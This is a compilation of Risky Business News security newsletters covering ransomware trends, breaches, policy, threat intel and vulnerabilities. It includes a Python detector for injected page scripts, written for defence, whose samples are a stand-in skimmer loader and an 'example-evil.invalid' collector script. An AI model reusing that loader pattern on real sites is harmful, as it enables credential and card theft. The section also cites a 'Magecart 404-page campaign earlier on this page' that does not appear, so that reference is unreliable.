New tools—Perfect/Fuse Loader: SpecterOps researcher Evan McBroom has open-sourced two tools named Perfect Loader and Fuse Loader to support an improved in-memory dynamic library loading process on Windows and Linux.

Red Hat closes security mailing list: Red Hat has shut down its security announcements mailing list. Users can still get security alerts via a free RSS feed or, for paying customers, a notification system.

Designer Vulnerabilities: Security researcher Mike Sass is maintaining a portal named Designer Vulnerabilities, containing a list of all fancy-pants vulnerabilities that have names, logos, custom websites, and such. The current tally is 407.

CISO salaries: CISO salaries have gone up by 11% in 2023, but growth has slowed, and fewer open positions are currently available. The average CISO salary this year has been $550,000, but more than half of CISOs are making below $400,000. According to a joint study of compensation data from more than 600 CISOs across Canada and the US, the best-paying jobs are on the US West Coast and in the tech and financial sectors. [Additional coverage in CybersecurityDive]

Podcast: Between Two Nerds

In this edition of Between Two Nerds Tom Uren and The Grugq examine the opportunities that ransomware gangs and business email compromise/romance scammers have to collaborate.

Risky Biz News: Human-operated ransomware attacks double in a year

9 October 2023 at 00:30

This newsletter is brought to you by Netwrix, an IT security software company that enables security professionals to strengthen their security and compliance posture across all three primary attack vectors: data, identity, and infrastructure. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

The number of human-operated ransomware attacks has more than doubled over the past year, Microsoft said in its yearly Digital Defense Report.

The term "human-operated ransomware" refers to intrusions where the ransomware is deployed manually by an operator rather than by automated scripts.

During these intrusions, one or more members of the ransomware group manually connect to a breached network and run commands in a terminal to make sure scripts execute with the proper parameters, data is exfiltrated without errors, and files are encrypted correctly.

These types of attacks have become the modus operandi of all the major top-tier ransomware gangs and their affiliates.

The number of human-operated ransomware incidents fell in 2022 after the start of the Russian-Ukrainian conflict, as the cybercrime underworld wrestled with allegiances, nationalism, and a reshuffling of services.

The disruption was short-lived, though, and by the end of the year things had returned to normal and resumed their upward trajectory. A Chainalysis report from July estimated that ransomware gangs stand to make $890 million by the end of 2023, which would give them their second most profitable year on record after 2021, when they extorted around $940 million from victims.

Coveware, Emsisoft, and NCC Group have all confirmed a return to normal in ransomware operations through 2023. The shock of the Russo-Ukrainian conflict has worn off, and ransomware gangs have resumed their marauding as if nothing happened.

The bounce-back is visible in Microsoft's numbers too. The company says that in June alone, human-operated ransomware incidents accounted for 40% of all ransomware detections. That's a huge figure if we compare it with the automated ransomware deployment campaigns that are getting blasted all over the internet on a daily basis. Think of ransomware delivered via malspam (malicious email spam) or hidden inside cracked software.

Microsoft credits this to a rise in the number of RaaS (Ransomware-as-a-Service) platforms and the affiliates they have been recruiting.

"Most of these attacks can be attributed to 123 tracked ransomware-as-a-service affiliates. The number of affiliates grew by 12 percent in the last year, setting up conditions for human-operated ransomware attacks to continue to grow in 2024."

Human-operated ransomware is also not a term that applies only to the high-end enterprise market. These attacks hit everyone, from small law offices in developing countries to government agencies.

Microsoft says that 70% of the organizations targeted by a human-operated ransomware attack had fewer than 500 employees.

In a fraction of cases, the ransomware groups also exfiltrated data from the hacked organization, a tactic known as double extortion, where the gang demands payment both to decrypt files and to not publish the stolen data on its dark web leak site.

While we honestly assumed this happens in the vast majority of targeted ransomware attacks, Microsoft puts the number at only 13%.

As other vendors have reported, most of these attacks begin after ransomware gangs obtain valid (stolen or purchased) credentials, gain access to external remote access services (VPN, RDP, etc.), or exploit vulnerabilities in public-facing apps and appliances (think Zoho ManageEngine, Microsoft Exchange, MOVEit, or PaperCut). Per Microsoft, the top three initial access vectors were evenly split, showing that "criminals are consistently exploiting the same vectors."

A Secureworks report last week found that once inside, ransomware gangs are quite fast at weaponizing their access, with half the ransomware incidents in the past year triggering less than a day after initial access.

Besides ransomware, the same report also touched on a few other topics. We summarized some of the main findings:

  • Of the 78% of IoT devices with known vulnerabilities on customer networks, 46% cannot be patched.

  • Attacks targeting open-source software have grown on average 742% since 2019.

  • Fewer than 15% of NGOs have cybersecurity experts on their staff.

  • Coin-mining activity was found in 4.2% of all IR engagements.

  • 17% of intrusions involved known RMM tools.

  • AitM phishing domains grew from 2,000 active domains in June 2022 to more than 9,000 in April 2023.

  • 156,000 daily BEC attempts were observed between April 2022 and April 2023.

  • 41% of the threat notifications Microsoft sent to online services customers between July 2022 and June 2023 went to critical infrastructure organizations.

  • The first quarter of 2023 saw a dramatic surge in password-based attacks against cloud identities.

  • Microsoft blocked an average of 4,000 password attacks per second over the past year.

  • Approximately 6,000 MFA fatigue attempts were observed per day.

  • The number of token replay attacks has doubled since last year, with an average of 11 detections per 100,000 active users in Azure Active Directory Identity Protection.

  • DDoS attacks are on the rise, with around 1,700 attacks each day and traffic reaching up to 90 terabits per second (Tbps).

  • State-sponsored activity pivoted away from high-volume destructive attacks in favor of espionage campaigns.

  • 50% of the destructive Russian attacks Microsoft observed against Ukrainian networks occurred in the first six weeks of the war.

  • Ghostwriter continues to conduct influence campaigns attempting to sow distrust between Ukrainian populations and European partners who support Kyiv—both governmental and civilian.

  • Iranian operations have expanded from Israel and the US to target Western democracies and NATO.

  • Palestinian Hamas (Storm-1133) activity intensified in 2023.


Breaches, hacks, and security incidents

Oospy shuts down: A spyware operation named Oospy has shut down operations. According to TechCrunch, the company appears to be a successor of Spyhide, an Android spyware company that got hacked earlier this year.

MGM to lose $100mil from ransomware attack: MGM Resorts expects to lose $100 million in the aftermath of a ransomware attack that crippled operations at its US properties last month. The company will also incur a $10 million loss resulting from consulting and legal fees related to the incident. In an SEC filing, MGM says the hackers who breached its network also stole the personal information of customers who used its hotels and casinos prior to March 2019. Stolen data includes names, phone numbers, email addresses, dates of birth, and driver's license numbers.

Blackbaud breach settlement: Cloud software provider Blackbaud has reached a joint settlement with the attorneys general of 49 US states over a July 2020 ransomware attack. The incident exposed data from more than 13,000 of the company's customers and the personal information of millions of those customers' end users. Blackbaud will pay $49.5 million, which the states will distribute to affected residents.

DCBOE hack: The District of Columbia Board of Elections says a hacker breached its systems and stole data on registered voters. The agency confirmed the breach after a hacker started selling the agency's data on an underground hacking forum. The hacker claimed to be in possession of more than 600,000 records. [Additional coverage in Cyberscoop]

Caesars breach: Caesars Entertainment has disclosed its late-August security breach to US state attorneys general. The company says the incident impacted its loyalty program database but has yet to determine the number of affected customers. As a reminder, Caesars is the one that paid the ransom, while MGM didn't and had its network encrypted.

Stars Arena crypto-heist: A threat actor has exploited a vulnerability in one of the smart contracts of the Stars Arena cryptocurrency platform and stolen $2.85 million worth of crypto assets.

DPRK suspected of Mixin hack: North Korean hackers are the prime suspects in the massive hack of cryptocurrency exchange Mixin. A White House official told Bloomberg Law last week the hack bears the hallmarks of a classic DPRK operation. The Hong Kong-based platform was hacked at the end of September and lost $200 million worth of crypto assets.

KMA cyberattacks: The Korea Meteorological Administration says it has seen a 378% increase in cyberattacks targeting its systems over the past four years. KMA officials believe the attackers are going after information about its supercomputer center and information centers that process weather information directly related to national security. Earlier this year, South Korean officials said they found a "spy chip" in KMA weather-measuring instruments made in China. [Additional coverage in EnergyDaily]

RedLights hack: A hacker has breached the systems of Belgian escort website RedLights and stolen the data of more than 415,000 users. The company says two-thirds of the stolen accounts are inactive; the rest covers 87,000 registered users and 41,000 sex workers advertising their services on the site. RedLights says [NSFW link] the attacker exploited a "manual coding error" to gain access to its website and is now threatening to sell the stolen data online. The company says it started encrypting personal data and private messages in February 2023, but data older than that may pose a threat to its users.

General tech and privacy

Grindr complaint: The EPIC privacy group has asked the FTC to investigate dating app Grindr for multiple privacy violations, including failing to delete the personal data of users who uninstalled the app and deleted their accounts.

Google Docs tracking links: Google is secretly inserting tracking parameters inside links in documents exported from Google Docs.

Cortana removal: Microsoft has removed the Cortana smart assistant from Windows 11 insider builds.

Brave layoffs: Brave Software has laid off 9% of its workforce, per TechCrunch.

Python survey: Around 7% of all Python developers are still using the deprecated 2.x branch.

"The number of Python 2 users has remained nearly the same for the last 3 years, below 7%. Nevertheless, some people still use version 2 for data analysis (29%), computer graphics (24%), and DevOps (23%)."

Government, politics, and policy

US location data scandal: The DHS Office of Inspector General has found that three US law enforcement agencies broke the law when they bought location data from the private sector. The DHS OIG says the CBP, ICE, and Secret Service did not follow the E-Government Act of 2002, which required the agencies to have strict privacy and access control policies in place. [Additional coverage in 404 Media]

Melissa partnership: Dutch police and representatives from ten major Dutch private sector companies have signed the Melissa partnership, an agreement to speed up cooperation procedures meant to help fight and disrupt ransomware operations in the Netherlands.

Sponsor section

In this Risky Business News sponsor interview Tom Uren asks Martin Cannard, VP of Product Strategy at Netwrix, how privileged access management can help defend organisations. 'Advanced Persistent Teenagers' regularly use social engineering techniques to compromise highly privileged accounts, but that doesn't mean it's instantly game over.

Cybercrime and threat intel

FTC social media scam numbers: The FTC says Americans have lost more than $2.7 billion since 2021 to online scams carried out via social media. This year alone, social media accounted for more than half of all reported losses, with many of the scams focusing on cryptocurrency theft. The FTC says social media is currently the preferred method of contact for most scammers, especially for younger targets, as it can allow threat actors to easily manufacture a fake persona, hack into your profile, pretend to be you, and con your friends.

"Social media gives scammers an edge in several ways. They can easily manufacture a fake persona, or hack into your profile, pretend to be you, and con your friends. They can learn to tailor their approach from what you share on social media. And scammers who place ads can even use tools available to advertisers to methodically target you based on personal details, such as your age, interests, or past purchases. All of this costs them next to nothing to reach billions of people from anywhere in the world."

New scam hitting SG: Forty-three Singaporeans lost more than $880,000 over the course of September 2023 to travel scammers advertising on social networks like Facebook and Instagram. Police say the scammers used travel ads to lure users into private conversations and then to install malicious Android apps on their devices. The apps collected e-banking details and granted the attackers access to the device. [Additional coverage in the Straits Times]

Webwyrm scammer group: A threat actor named Webwyrm is believed to have made more than $100 million from online scams. The group runs more than 6,000 websites that imitate legitimate brands and redirect incoming visitors to hundreds of WhatsApp numbers and Telegram channels where victims get defrauded. According to security firm CloudSEK, the group has claimed more than 100,000 victims across over 50 countries in just a few months since late 2022.

Storm-0324: Trellix has a report on Storm-0324, a threat actor operating as an initial access broker for Sangria Tempest (TA543, Clop), a known ransomware affiliate. Microsoft had a similar report on this pair last month. Both reports cover Storm-0324's use of Microsoft Teams for initial access.

Citrix NetScaler campaign: A threat actor is hacking Citrix NetScaler devices and modifying login pages to add a script that harvests login credentials. The campaign appears to have started in early August and has compromised at least 600 NetScaler systems, according to IBM's X-Force security team. The attacks are leveraging CVE-2023-3519, a vulnerability Citrix patched this July. The same vulnerability was also exploited to drop the AlphV ransomware shortly after the patch.
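
Both the NetScaler login-page campaign above and the Magecart 404-page campaign earlier on this page come down to the same detectable artifact: a script on a page you own that you did not put there. The scanner below is an added example written for this newsletter, not code from Akamai or IBM X-Force: it parses a page's HTML, flags external scripts whose host is not on an allowlist, and flags inline scripts or HTML comments that carry a long base64 run decoding to JavaScript. The two sample pages, the allowlisted hosts, and the hidden payload are constructed for the demonstration and are not captured from any real victim.

```python
# Added example, not code from Akamai or IBM X-Force: scan a page's HTML for scripts
# that do not belong there, covering the two hiding places described above
# (an unexpected external script on a login page; an encoded payload on a 404 page).
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

B64_RUN = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")  # assumption: 60+ chars is "long"


class ScriptCollector(HTMLParser):
    """Collect external script sources, inline script bodies, and HTML comments."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self.comments = [], [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script, self._buf = True, []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_comment(self, data):
        self.comments.append(data)


def looks_like_hidden_payload(text):
    """True if text holds a long base64 run that decodes to something resembling JavaScript."""
    for m in B64_RUN.finditer(text):
        blob = m.group(0)
        try:
            decoded = base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("utf-8", "ignore")
        except (ValueError, TypeError):
            continue
        if any(k in decoded for k in ("document.", "fetch(", "XMLHttpRequest", "eval(", "location")):
            return True
    return False


def scan_page(html, allowed_hosts):
    """Return findings for scripts off the allowlist and for encoded JavaScript
    smuggled in inline scripts or comments. An empty list means nothing suspicious."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlparse(src).netloc
        if host and host not in allowed_hosts:
            findings.append(f"external script from unexpected host: {src}")
    for body in p.inline:
        if looks_like_hidden_payload(body):
            findings.append("inline script carries a base64-encoded JavaScript payload")
    for c in p.comments:
        if looks_like_hidden_payload(c):
            findings.append("HTML comment carries a base64-encoded JavaScript payload")
    return findings


# Constructed samples. The payload is a stand-in loader, not a real skimmer.
PAYLOAD = 'var s=document.createElement("script");s.src="https://skimmer.invalid/loader.js";document.head.appendChild(s);'
ENCODED = base64.b64encode(PAYLOAD.encode()).decode()

SAMPLE_404 = f"""<html><head><title>404 Not Found</title>
<script src="https://shop.example/static/app.js"></script></head>
<body><h1>Page not found</h1>
<!-- cookie_consent_cfg:{ENCODED} -->
</body></html>"""

SAMPLE_LOGIN = """<html><head><title>Gateway Login</title>
<script src="https://gateway.example/vpn/js/login.js"></script>
<script src="https://cdn.example-evil.invalid/collect.js"></script>
</head><body><form id="login"><input name="login"><input name="passwd" type="password"></form>
<script>document.getElementById("login").focus();</script>
</body></html>"""

if __name__ == "__main__":
    print(scan_page(SAMPLE_404, {"shop.example"}))
    print(scan_page(SAMPLE_LOGIN, {"gateway.example"}))
```

Run it against a copy of the live page fetched the way a browser would (including the 404 page, which `curl` of a nonexistent path will give you) and diff the findings over time; the allowlist is the part that has to be maintained, and a new host appearing on a login or checkout page is the signal in both campaigns.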

New npm malware: Twenty-three malicious npm packages were discovered last week. Check out GitHub's security advisory portal for more details.

Israel-Gaza hacktivism: StrikeSource threat intel analyst Julian B. has a timeline of hacktivist activity in the aftermath of the recent Hamas-Israel conflict. More here.

"Of interest is the speed at which Anonymous Sudan launched it's first DDoS attacks against alerting systems. Less than 1 hour after the first rockets were launched against Israel, the alerting systems were taken offline."

BreachForums responds: After the operators of the RansomedVC ransomware gang announced a "partnership" with the BreachForums data trading portal last week, the site's admin has disavowed any connection or partnership with the gang.

Predator Files: The European Investigative Collaborations (EIC) and Amnesty International have published a joint investigation named the Predator Files that focuses on the "Intellexa alliance," a suite of companies behind the Predator spyware and other surveillance products. Articles have been published in several national outlets describing the company's structure and lobby efforts, and an Amnesty technical report takes a look at all of Intellexa's products and reveals for the first time the Predator backend and UI.

"Amnesty International's analysis of recent technical infrastructure linked to the Predator spyware system indicates its presence, in one form or another, in Sudan, Mongolia, Madagascar, Kazakhstan, Egypt, Indonesia, Viet Nam, and Angola, among others."

Malware technical reports

Supershell botnet: Security researchers from SOCRadar have discovered a new botnet named Supershell. The botnet is built using open-source software, operates by deploying reverse SSH shells on infected systems, and focuses on crypto-mining operations. So far, SOCRadar says it has identified 85 botnet control panels deployed across the internet, suggesting that several threat actors are using the Supershell botnet platform for their operations.

Balada Injector: GoDaddy's Sucuri says the Balada Injector gang is exploiting tagDiv themes and plugins to insert its malware on legitimate sites.

LostTrust ransomware: A SentinelOne analysis of the new LostTrust ransomware shows similarities to the SFile, Mindware, and MetaEncryptor families—and a possible rebrand of the latter. Just like most

Sponsor Section

To protect your business, you need to understand and measure your attack surface and then implement a continuous, comprehensive approach to reducing it. Read Netwrix's guide to learn how to reduce your privileged attack surface and adopt a Zero Trust approach.

APTs and cyber-espionage

NIS warning: South Korea's National Intelligence Service (NIS) says that North Korean hackers have recently shifted targeting and are now going after the country's shipbuilding industry. Officials say the new orders came directly from Kim Jong-un after his joint summit with Russian President Vladimir Putin last month. South Korean officials say Kim ordered his government to focus on building medium-to-large warships. [Additional coverage in SPNews]

North Korean Android malware: Security researcher Ovi Liber takes a look at the evolution of North Korea's Android malware—namely, the ROKRAT and RambleOn strains.

UAC-0006: CERT-UA says that a financially motivated group tracked as UAC-0006 launched four waves of cyberattacks last week, aiming to infect Ukrainian government agencies with the SmokeLoader malware.

Z bloggers influence ops: DarkOwl looks at the top three Russian "Z blogger" propagandists and their Telegram channels pushing pro-invasion propaganda.

Vulnerabilities, security research, and bug bounty

Google VRP news: Google plans to pay security researchers for n-day exploits in Chrome's V8 engine and Google Cloud's Kernel-based Virtual Machine (KVM). The new Google VRP program will pay bug bounty hunters for developing exploits for vulnerabilities they didn't discover. Google says it's looking to learn from exploit developers who may not be interested in finding new vulnerabilities but use unique exploitation techniques the company might want to mitigate.

CISA removes KEV entries: For the first time, CISA has removed entries from KEV, its catalog of actively exploited vulnerabilities. The agency removed five vulnerabilities in Owl Labs video conferencing products, which it had added to KEV in mid-September.

Apple vulnerability: Moonlock researchers look at CVE-2022-48574, a now-patched vulnerability in the Apple NSServices feature.

Sangfor firewall vulnerability: watchTowr Labs has found five vulnerabilities in NextGen Application Firewall (NGAF), a firewall manufactured by Chinese security firm Sangfor. The vulnerabilities include issues like an authentication bypass, command injection, and SQL injection. Researchers say Sangfor has not patched any of the issues and has even called some of its reports "false positives." No CVEs have been assigned.

Infosec industry

New tool—PIPEDANCE client: Elastic's security team has released a client that can connect to and control PIPEDANCE malware samples.

CCC returns: The Chaos Communication Congress is returning as a live event after a three-year hiatus caused by the COVID-19 pandemic.

Infosec investments in Q3 2023: The Pinpoint Search Group says it tracked more than $2.3 billion in cybersecurity funding rounds and investments across the third quarter of 2023. The number is 21% up compared to the same period in 2022, when cybersecurity firms raised $1.86 billion. So far this year, cybersecurity vendors have raised $7.1 billion across 261 rounds.

Risky Business Podcasts

In this edition of Between Two Nerds, Tom Uren and The Grugq examine whether offensive cyber operations against ransomware groups have succeeded or failed. And how would we even know?

Risky Biz News: Tech companies and security firms rally against EU vulnerability disclosure rules

6 October 2023 at 00:30

This newsletter is brought to you by Proofpoint. You can subscribe to an audio version of this newsletter as a podcast by searching for "Risky Business News" in your podcatcher or subscribing via this RSS feed. On Apple Podcasts:

A group of more than 50 tech experts and organizations have signed an open letter asking EU officials to rethink Article 11 of the upcoming EU Cyber Resilience Act.

The article introduces a mandatory requirement for software vendors to report actively exploited vulnerabilities to ENISA, the EU's cybersecurity agency, within 24 hours of becoming aware of in-the-wild exploitation. ENISA would then relay this information to national CSIRTs and market surveillance authorities across member states.

The open letter's signatories argue that the CRA's Article 11—in its current form, at least—greatly expands the number of organizations that will have first-hand and real-time immediate knowledge of actively exploited vulnerabilities, which, in turn, increases the risks to product vendors, their customers, and the general public.

Signatories raise three main issues with Article 11's broadened zero-day disclosure spectrum.

First, they fear that information on actively exploited bugs will eventually make its way into the hands of some intelligence agencies and be abused for intelligence and surveillance operations. Not a bad argument, especially after some EU member states have been caught abusing spyware in obvious cases of human rights abuse and illegal surveillance over the past 3-4 years.

Second, signatories argue that with so many new parties involved in dealing with zero-day information, there is now the risk of more leaks and accidental disclosures. Such cases would provide details about active exploitation to threat actors, who could then (re)create the exploits and abuse the same bugs in their own campaigns.

Third, experts also fear the new EU zero-day disclosure rules will interfere with existing coordinated disclosure procedures, which, in some cases, tend to keep ongoing exploitation secret until they can prepare and test patches.

"As a result, the CRA may reduce the receptivity of manufacturers to vulnerability disclosures from security researchers, and may discourage researchers from reporting vulnerabilities, if each disclosure triggers a wave of government notifications."

I'm not sure about this particular point, but the first two have their merits.

The open letter criticizes the CRA Article 11 but also proposes a set of modifications.

  • Agencies should explicitly be prohibited from using or sharing vulnerabilities disclosed through the CRA for intelligence, surveillance, or offensive purposes.

  • The CRA should not require reporting of vulnerabilities that are exploited through good faith security research.

  • Require reporting to agencies of mitigatable vulnerabilities only, within 72 hours of effective mitigations (e.g., a patch) becoming publicly available.

The letter's signatories include representatives from Google, Arm, the EFF, and many of today's top security vendors like Bitdefender, ESET, Trend Micro, Rapid7, HackerOne, BugCrowd, and Tenable.


Breaches, hacks, and security incidents

23andMe denies breach: DNA and genetic testing service 23andMe denies having suffered a security breach after a threat actor claimed to have hacked the company and stolen the DNA-related data of more than seven million registered users.

Sony breach: Sony Interactive Entertainment has joined the list of more than 2,300 companies impacted by the MOVEit hacks. The company says the hackers stole data on current and former employees and their families. The breach took place in late May, according to a letter Sony filed with US authorities. Almost 7,000 people are impacted.

Lyca Mobile cyber attack: A cyber attack has impacted the network of British virtual mobile operator Lyca Mobile. The company says the incident disrupted national and international calling and prevented customers from adding new minutes to SIM cards. Lyca says the incident impacted 56 of the 60 countries the company is active in. Unaffected markets included the US, Australia, Ukraine, and Tunisia. [Additional coverage in SecurityWeek]

Xiaomi outage: A massive outage has hit Xiaomi devices across Russia and Belarus. The incident prevented user devices from connecting to the Mi Home service. The outage impacted security cameras, vacuum cleaners, and other smart devices. [Additional coverage in RBC]

Major API keys leak: Truffle Security has identified more than 700 live API keys and passwords that were included in GitHub comments. The comments were filed with pull requests and issue trackers. Researchers say human users authored 97% of all the comments and that most commenters had no relation to the projects.

General tech and privacy

ECH in Firefox: Support for Encrypted ClientHello (ECH) has been enabled for all Firefox 118 users. ECH is a new TLS extension that encrypts the ClientHello message of the TLS handshake, so the user's website destination (the SNI hostname) is no longer leaked in plaintext. Google rolled out support for ECH in Chrome last month with the release of Chrome 117.

Yahoo anti-spam features: Earlier this week, Google announced a set of new rules for email bulk-senders. Yahoo has announced the same rules. The rules will require bulk senders to authenticate their emails and provide easy ways for users to unsubscribe. The new Yahoo anti-spam rules will come into effect in the first quarter of 2024.

Android 14 is out: Google has announced that its newest Pixel 8 smartphone will receive seven years of software and security updates. Prior to the announcement, Pixel devices were only supported for five years. Google announced the new Pixel 8 extended support on the same day the company released Android 14, the latest version of the Android mobile operating system.

Government, politics, and policy

MACE Act: The US House of Representatives has passed a bill that would remove minimum education requirements on federal cybersecurity jobs. Named the Modernizing the Acquisition of Cybersecurity Experts Act, the bill is the latest in a long series of US legislation aimed at addressing a shortage of cybersecurity experts in federal agencies. The bill passed with an overwhelming 394-1 vote and is now headed to the Senate floor, where it is expected to pass as well. [Additional coverage in FedScoop]

CISA social media ban reinstated: A US federal appeals court has reinstated a ban on CISA from interacting with social media companies as part of the agency's efforts to combat online dis/misinformation. The suit, filed by two Republican Attorneys General, argues CISA is limiting fReE sPeEcH. [Additional coverage in CNN]

Russia tests social scoring system: A Russian university has developed and is testing a social scoring system inspired by the one in use in China. Named We (Мы), the platform has been developed by the Russian State Social University in Moscow. The We system will produce a social score for Russians based on their personal life, education, financial status, criminal record, public life, and internet activity. Work on the platform began in July 2022, and the first version is now being tested with the university's students. Back in 2018, Russian officials described a Chinese-style social scoring system as "a threat to Russia." [Additional coverage in the Moscow Times]

Cyberattacks on Ukraine power grid: Ukraine Energy Minister German Galushchenko says cyberattacks are a bigger threat to the country's power grid than rockets and drones because the repercussions of a cyber incident can paralyze whole systems rather than impact small substations—as rockets usually tend to do. [Additional coverage in The Economist/non-paywall]

Hacktivism "rules": Two legal advisers for the International Committee of the Red Cross (ICRC) have published a set of eight recommendations/rules for "civilian hackers" (aka hacktivists) involved in an armed conflict. The rules are clearly inspired by the activities of pro-Russian and pro-Ukrainian hacktivists in the recent Russo-Ukrainian conflict. Those groups don't seem impressed by, or to care about, the new rules. Despite some media reporting that the "ICRC" formally published the new rules, it did not. They were published on a legal blog, and both authors described it as their own opinion. The eight rules are:

  1. Do not direct cyber attacks* against civilian objects.

  2. Do not use malware or other tools or techniques that spread automatically and damage military objectives and civilian objects indiscriminately.

  3. When planning a cyber attack against a military objective, do everything feasible to avoid or minimize the effects your operation may have on civilians.

  4. Do not conduct any cyber operation against medical and humanitarian facilities.

  5. Do not conduct any cyber attack against objects indispensable to the survival of the population or that can release dangerous forces.

  6. Do not make threats of violence to spread terror among the civilian population.

  7. Do not incite violations of international humanitarian law.

  8. Comply with these rules even if the enemy does not.

Sponsor section

In this Risky Business News sponsor interview, Tom Uren talks to Selena Larson, Senior Threat Intelligence Analyst at Proofpoint, about the state of play in the cybercrime ecosystem. People and organizations are getting better at protecting themselves from scams and compromises, but criminals will use every possible avenue to reach people and scam them.

Cybercrime and threat intel

PEACHPIT botnet takedown: Human Security has disrupted the operations of PEACHPIT, a vast ad fraud botnet operated by the BADBOX threat actor. BADBOX assembled the PEACHPIT botnet by selling backdoored Android TV streaming boxes on popular online stores and by spreading malicious Android and iOS apps. The purpose of the botnet was to secretly install apps on the infected devices that would show and play unwanted ads. At its peak, researchers say PEACHPIT was communicating with more than 121,000 Android devices and more than 159,000 iOS devices a day. Human says the BADBOX group operates out of China and most likely has access to hardware supply chains.

Casinos are laundering cybercrime profits: A ProPublica investigation has found that casinos in Cambodia, Laos, and Myanmar are helping local cybercrime groups launder funds obtained through online scams.

Bentley servers: An investigation has linked servers hosting LockBit stolen data to Bentley, a former member of the Conti gang. Researchers say the server is hosted in Moscow. A Palo Alto Networks investigation last week also found that the Clop gang has been hosting some of its servers in Moscow as well.

Qakbot gang: The threat actors behind the recently dismantled Qakbot botnet have now switched to distributing the Remcos RAT and the Knight ransomware, per Cisco Talos.

SpyNote evolution: Mobile security firm Pradeo says it is seeing the SpyNote spyware evolve from a RAT to a banking trojan.

Stream-jacking attacks: Bitdefender says it's seeing threat actors hijack popular YouTube channels to push Musk-themed crypto-scams. Welcome to 2016!

Polymorphic EDR Killer: CyFirma security researcher Kaushík Pał has discovered threat actors advertising a new EDR killer app that can mutate its code in order to avoid detection.

ICS exposure: Bitsight says it identified more than 100,000 industrial control systems (ICS) exposed on the internet. This includes equipment like sensors, tank gauges, building management systems, actuators, valves, relays, and more.

Dwell time plummets: Threat actors are deploying ransomware on breached networks faster than ever before. In just 12 months, the median dwell time of ransomware groups on hacked networks has fallen from 4.5 days to less than one day. According to security firm Secureworks, ransomware is being deployed within one day of initial access in more than 50% of engagements and within five hours of initial access in 10% of cases.

Rootkits on npm: ReversingLabs has discovered a malicious package on the npm repository that infected developer workstations with a rootkit and a remote access trojan. The package was live for several days and downloaded more than 700 times.

PyPI crypto hacker: A threat actor has stolen more than $100,000 worth of cryptocurrency from Python developers this year. The attacker used hundreds of malicious Python libraries uploaded to the official PyPI portal. The libraries contained a Windows infostealer that collected passwords and other valuable data from infected developer machines. Security firm Checkmarx says the campaign began in April this year, and its sophistication grew each month with more layers of obfuscation and encryption.

Malware technical reports

GoldDigger: Group-IB has discovered a new banking trojan named GoldDigger that specifically targets users of over 50 Vietnamese banking, e-wallets, and crypto-wallet apps.

Snake keylogger: ANY.RUN has a breakdown of the Snake keylogger.

RevengeRAT: Embee Research explains how to extract configuration data from RevengeRAT samples.

New Mirai variants: Chinese security firm NSFOCUS takes a look at three recent versions of the Mirai DDoS malware—hailBot, kiraiBot, and catDDoS.

Sponsor Demo Section

Ryan Kalember shows Risky Business host Patrick Gray Proofpoint's Sigma platform. Sigma is a data loss prevention and insider threat detection tool that crunches data from different sources and presents a unified view of it.

APTs and cyber-espionage

Semiconductor spying: A Chinese cyber-espionage group has launched a campaign against semiconductor companies in Taiwan, Hong Kong, and Singapore. The attack involves a spear-phishing campaign with a TSMC lure that tries to infect targets with a version of the HyperBro loader. The malware was previously used in attacks carried out by the Iron Tiger group, also known as APT27, Budworm, LuckyMouse, or Emissary Panda.

Operation Jacana: ESET researchers have identified a cyber-espionage campaign targeting a governmental entity in Guyana. While ESET has not formally attributed the attacks, they believe the campaign was the work of a China-aligned threat group.

Vulnerabilities, security research, and bug bounty

NVD milestone: The US NIST National Vulnerability Database (NVD) is now storing information on more than 200,000 vulnerabilities. (h/t Patrick Garrity)

Top 10 misconfigs: The blue and red teams at CISA and the NSA have published a list with the top 10 most common misconfigurations they have encountered in large organizations. The shortlist is below, and a full breakdown is in the joint document.

  1. Default configurations of software and applications

  2. Improper separation of user/administrator privilege

  3. Insufficient internal network monitoring

  4. Lack of network segmentation

  5. Poor patch management

  6. Bypass of system access controls

  7. Weak or misconfigured multi-factor authentication (MFA) methods

  8. Insufficient access control lists (ACLs) on network shares and services

  9. Poor credential hygiene

  10. Unrestricted code execution

Apple zero-days: Apple has released a security update for iOS devices to patch two actively exploited zero-days. The first is a vulnerability (CVE-2023-42824) in the iOS kernel that Apple says was exploited against older iPhones using iOS 16.6 or lower. The second is a zero-day (CVE-2023-5217) in the Libvpx library that Google disclosed last week and that Apple has now also fixed in iOS.

Confluence zero-day: Atlassian has released a security update to patch an actively exploited zero-day in Confluence "Data Center" and "Server" appliances. Tracked as CVE-2023-22515, the vulnerability can be used to create unauthorized admin accounts and access Confluence resources. The vulnerability has a severity rating of 10/10.

macOS DirtyNIB vulnerability: Security researcher Adam Chester has discovered a vulnerability that allows malicious processes to hijack macOS app entitlements. Chester named the vulnerability DirtyNIB as the exploit relies on replacing NIB files inside app bundles while not breaking an app's entitlements and Gatekeeper verification.

cURL security fix coming: The cURL library will receive a security fix on October 11. The fix addresses a high-severity vulnerability described as one of the most severe issues patched in cURL in recent years.

X.org vulnerabilities: The X.org team has patched five vulnerabilities in two of its component libraries.

Cisco security updates: Cisco has released five security updates, including a patch to remove credentials for the root account from some of its firmware.

Printer vulnerabilities: Devcore has published a detailed write-up on three printer vulnerabilities it used at the Pwn2Own hacking contest back in 2021. The vulnerabilities are pre-auth RCEs and impact Canon, HP, and Lexmark printers.

Looney Tunables PoCs: Several PoC exploits have been published for Looney Tunables, a recently disclosed LPE in the glibc library.

Supermicro BMC bugs: Supermicro has released a security update to patch seven vulnerabilities in the IPMI firmware of its BMC products. Several of the patched vulnerabilities can be exploited by unauthenticated attackers to gain root access to remote systems via the BMC web-facing frontend. More than 70,000 Supermicro IPMI BMC systems have their web interfaces exposed on the internet. Researchers at Binarly say Supermicro tried to reduce the severity of its bugs during the disclosure process and encourage companies to apply the available patches as soon as possible.

